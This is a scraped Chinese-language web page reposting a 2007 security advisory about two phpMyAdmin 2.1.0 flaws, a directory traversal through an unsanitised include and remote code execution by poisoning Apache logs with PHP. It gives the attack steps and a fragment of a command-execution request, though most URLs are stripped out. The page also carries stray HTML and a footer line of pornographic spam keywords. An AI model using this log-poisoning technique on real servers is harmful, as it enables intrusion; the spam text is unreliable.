• <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>
    

    <progress id="5koa6"></progress>
  • 

    <strong id="5koa6"></strong>
  • 

    
  
    
     
  
    
  
    
 
      劉慈欣談ChatGPT:人類的無能反而 劉慈欣談ChatGPT:人類的無能反而  
    

      OpenAI 因使用“竊取”的個人數據 OpenAI 因使用“竊取”的個人數據  
    

      搜狐回應員工遭遇工資補助詐騙: 搜狐回應員工遭遇工資補助詐騙:  
    

    
    
    
                   
    
    
  
    
  
    
    
    
  
    
  
    
    
    
      
    
        
    
          
    
          軟件測試 > 測試開發技術 > 軟件測試環境搭建 > 網絡服務器 > 
         
    
        
    
        
    
          
                   
    
        
    
      
    
    
    
  
    
  
    
    
    
  
    
  
    
    
    
      
    
        
    
           
    phpMyAdmin2.1.0存在兩個漏洞
    
              
    發表于:2007-07-02來源:作者:點擊數:
              標簽:
              
    
              
    
                phpMyAdmin ( ) 是一款管理 MySQL 數據庫 的 PHP 工具,具有基于 WEB 的界面。但是發現它存在漏洞??蛇x擇安裝新發布穩定版本: phpMyAdmin 2.2.0。 1、目錄遍歷漏洞 攻擊者通過提供如下的 URL: (*) 能非法訪問系統文件 有問題的代碼在: @#include($goto);@
              
    
          
        phpMyAdmin (  ) 是一款管理 MySQL 數據庫的 PHP 工具,具有基于 WEB 的界面。但是發現它存在漏洞??蛇x擇安裝新發布穩定版本: 
    phpMyAdmin 2.2.0。 
    


     
    


    1、目錄遍歷漏洞 
    


    攻擊者通過提供如下的 URL: 
    


     (*) 
    


     
    


    能非法訪問系統文件 
    


    有問題的代碼在: 
    @#include($goto);@# in sql.php and in tbl_replace.php. 
    


    2、執行攻擊者代碼漏洞 
    


    通過使用全局可寫日志文件,攻擊者能在受影響服務器上執行任意代碼。 
    


    首先,得到 Apache 配置文件以便知道日志文件存儲位置: 
    


     
     
     
    


    可以看出,日志放在: 
    /var/log/httpd/error_log 
    /var/log/httpd/access_log 
    


    然后 telnet 到 端口80 
    


    # telnet  80 
    Trying xxx.xxx.xxx.xxx... 
    Connected to . 
    Escape character is @#^]@#. 
    GET 
    



    ^] 
    telnet> quit 
    Connection closed. 
    # 
    


    在 GET 請求之后,攻擊者能將任意 PHP 代碼上傳 
    


    現在,可以用 Apache 用戶身份遠程運行命令了: 
    


     
    access_log&btnDrop=No?meters=ls%20-l%20/ 
    


    受影響系統: 
    phpMyAdmin 2.1.0 
    


    解決方案: 
    建議: 
    1.使用 phpMyAdmin 2.2.0 
     
    2.用戶下載安裝補?。?
     
                 



           
    原文轉自:http://www.kjueaiud.com
    
           
    
  
    


    
           
          
    
            
      
              
            
    
          
    
         
          
 
    
           

          
    

          
        
    
      
    
    
    
   
   
    
      
    
        
    
          
     相關文章
    
        
    
        
    
          
        
    
        
    
       
	   
	   
	   
  
    
   
          
                   
    
         
   
  
    




    
        
      
    
      
    
        
    
          
     軟件測試沙龍 More>> 
    
        
    
        
     
        
        
        
        
    
      
    
      
    
        
    
          
     新浪微博More>>
    
        
    
        
    
          
        
    
      
    
      ...
      
    
          
     熱門標簽 
    
        
    
        
    
          
          
    
            
             
      
              
      • 
              
      • 
              
      • 
              
      • 
            
    
          
    
        
    
      
    
  
    

    
    
    
      
    
    
  
    

    


老湿亚洲永久精品ww47香蕉图片_日韩欧美中文字幕北美法律_国产AV永久无码天堂影院_久久婷婷综合色丁香五月

    • <ruby id="5koa6"></ruby>
    <ruby id="5koa6"><option id="5koa6"><thead id="5koa6"></thead></option></ruby>
    

    <progress id="5koa6"></progress>
  • 

    <strong id="5koa6"></strong>
  •